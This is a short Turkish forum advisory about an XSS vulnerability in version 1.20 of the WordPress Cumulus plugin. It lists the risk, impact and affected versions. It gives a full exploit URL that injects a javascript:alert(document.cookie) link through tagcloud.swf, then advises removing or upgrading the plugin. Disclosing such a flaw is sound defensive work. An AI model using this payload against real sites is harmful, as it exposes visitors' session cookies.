folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Wordpress Cumulus Eklentisi XSS Güvenlik Açığı



Wordpress Cumulus Eklentisi XSS Güvenlik Açığı

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Master
    Master's avatar
    Kayıt Tarihi: 10/Nisan/2007
    Erkek

     

    Risk: Normal
    Etki: Cross-Site-Scripting (XSS) Saldırına mahruz kalmak
    Etkilenenler: Cumulus 1.20 sürümlü eklentiyi kullanan WordPress Bloglar
    Remote Exploit: Aktif -Mevcut
    Bilgi: WordPress’in Cumulus eklentisinin 1.20 sürümünde keşfedilen Güvenlik açığı eklentinin kurulu olduğu WordPress bloglarda Cross-Site-Scripting (XSS) Saldırıları yapılmasına neden oluyor.
    Exploit: http://hedefsite/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&tagclou
    d=%3Ctags%3E%3Ca+href=’javascript:alert(document.cookie)’+style=’font-si
    ze:+40pt’%3EClick%20me%3C/a%3E%3C/tags%3E

    Eklentinin Orjinal Dizini: http://hedefsite/wp-content/plugins/wp-cumulus/wp-cumulus.php

    Nasıl Korunabiliriz, Güvenlik Önlemi Nedir ?

    İlgili eklentiyi Bloğunuzda varsa kaldırabilir ya-da Cumulus eklentisinin bir üst sürümüne geçebilirsiniz.

    Ref & Kaynak: http://www.onuroktay.com/?p=570


    Bilgi güçtür, düşmanını barışa zorlar.
Toplam Hit: 1547 Toplam Mesaj: 1